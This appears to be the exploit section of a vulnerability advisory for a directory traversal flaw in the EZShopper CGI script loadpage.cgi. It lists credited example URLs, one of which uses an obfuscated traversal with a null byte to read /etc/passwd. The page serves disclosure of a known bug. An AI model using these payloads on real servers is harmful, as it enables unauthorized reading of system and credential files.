Alex Heiphetz Group EZShopper Directory Traversal Vulnerability

info
discussion
exploit
solution
references

Alex Heiphetz Group EZShopper Directory Traversal Vulnerability

Nsfocus Security Team <security@nsfocus.com> has provided the following examples:

EZshopper v3.0:
http://www.example.com/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/

EZshopper v2.0:
http://www.example.com/cgi-bin/ezshopper2/loadpage.cgi?id+/

Zero X <Zero_X@excluded.org> provided the following example:
http://www.example.com/cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.|./etc/passwd%00.html